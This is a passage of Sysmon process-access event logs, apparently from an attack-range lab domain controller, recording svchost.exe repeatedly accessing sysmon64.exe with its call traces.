C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4565,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4566,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4567,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4568,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4569,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4570,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4571,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4572,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 